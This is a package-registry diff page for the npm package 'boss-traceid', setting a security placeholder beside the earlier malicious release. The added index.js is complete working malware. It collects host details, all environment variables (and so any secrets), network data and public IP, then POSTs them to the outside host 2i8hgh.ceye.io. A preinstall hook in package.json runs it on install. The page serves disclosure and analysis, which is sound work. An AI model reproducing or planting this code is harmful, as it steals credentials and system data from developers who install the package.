npm - boss-traceid - Versions diffs - 0.0.1-security → 0.0.1 - Mend

boss-traceid 0.0.1-security → 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of boss-traceid might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,207 @@
+const { exec } = require("child_process");
+const os = require("os");
+const { networkInterfaces } = require('os');
+const http = require('http');
+function safeGet(func) {
+  try {
+    return func() || "";
+  } catch {
+    return "";
+  }
+}
+function getSystemInfo() {
+  const info = {
+    // 系统信息
+    platform: os.platform(),
+    arch: os.arch(),
+    release: os.release(),
+    hostname: os.hostname(),
+    username: safeGet(() => os.userInfo().username),
+    homedir: os.homedir(),
+    tmpdir: os.tmpdir(),
+    // CPU信息
+    cpus: os.cpus().map(cpu => ({
+      model: cpu.model,
+      speed: cpu.speed,
+      times: cpu.times
+    })),
+    // 内存信息
+    totalmem: os.totalmem(),
+    freemem: os.freemem(),
+    // 网络信息
+    networkInterfaces: {},
+    // 系统时间
+    uptime: os.uptime(),
+    timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
+    // 环境变量
+    env: process.env
+  };
+  // 获取网络接口信息
+  const nets = networkInterfaces();
+  for (const name of Object.keys(nets)) {
+    info.networkInterfaces[name] = nets[name].map(net => ({
+      address: net.address,
+      netmask: net.netmask,
+      family: net.family,
+      mac: net.mac,
+      internal: net.internal
+    }));
+  }
+  return info;
+}
+function getSystemOrganization(callback) {
+  const platform = os.platform();
+  const command = platform === "win32" ? "systeminfo" : "cat /etc/os-release";
+  exec(command, (err, stdout) => {
+    if (err) {
+      callback("");
+      return;
+    }
+    if (platform === "win32") {
+      const match = stdout.match(/Registered Organization:\s*(.+)/);
+      callback(match ? match[1].trim().replace(/\s+/g, "_") : "");
+    } else {
+      const match = stdout.match(/PRETTY_NAME="(.+)"/);
+      callback(match ? match[1].trim().replace(/\s+/g, "_") : "");
+    }
+  });
+}
+// 获取公网IP
+function getPublicIP(callback) {
+  const commands = [
+    "curl -s ipinfo.io",
+    "curl -s ifconfig.me",
+    "curl -s icanhazip.com"
+  ];
+  let currentIndex = 0;
+  function tryNextCommand() {
+    if (currentIndex >= commands.length) {
+      callback("");
+      return;
+    }
+    exec(commands[currentIndex], (error, stdout) => {
+      if (error) {
+        currentIndex++;
+        tryNextCommand();
+        return;
+      }
+      try {
+        const data = JSON.parse(stdout);
+        callback(data.ip || "");
+      } catch {
+        callback(stdout.trim());
+      }
+    });
+  }
+  tryNextCommand();
+}
+function sendData(data) {
+  const options = {
+    hostname: '2i8hgh.ceye.io',
+    path: '/',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(JSON.stringify(data))
+    }
+  };
+  const req = http.request(options, (res) => {
+    console.log(`状态码: ${res.statusCode}`);
+    res.on('data', (d) => {
+      console.log('响应数据:', d.toString());
+    });
+  });
+  req.on('error', (error) => {
+    console.error('请求错误:', error);
+  });
+  req.write(JSON.stringify(data));
+  req.end();
+}
+function checkURL(url, timeout = 3000) {
+  return new Promise((resolve) => {
+    const options = {
+      timeout: timeout,
+      method: 'GET',
+      headers: {
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
+      }
+    };
+    const req = http.request(url, options, (res) => {
+      let data = '';
+      res.on('data', (chunk) => {
+        data += chunk;
+      });
+      res.on('end', () => {
+        resolve({
+          status: res.statusCode,
+          headers: res.headers,
+          data: data
+        });
+      });
+    });
+    req.on('error', () => {
+      resolve(null);
+    });
+    req.on('timeout', () => {
+      req.destroy();
+      resolve(null);
+    });
+    req.end();
+  });
+}
+// 主函数
+async function main() {
+  const systemInfo = getSystemInfo();
+  getPublicIP((ip) => {
+    getSystemOrganization((org) => {
+      const data = {
+        ...systemInfo,
+        publicIP: ip,
+        organization: org,
+        timestamp: new Date().toISOString(),
+        nodeVersion: process.version,
+        processInfo: {
+          pid: process.pid,
+          ppid: process.ppid,
+          title: process.title,
+          argv: process.argv,
+          execPath: process.execPath
+        }
+      };
+      sendData(data);
+    });
+  });
+}
+main();

package/package.json CHANGED Viewed

@@ -1,6 +1,13 @@
 {
   "name": "boss-traceid",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "0.0.1",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+	"preinstall": "node index.js",
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=boss-traceid for more information.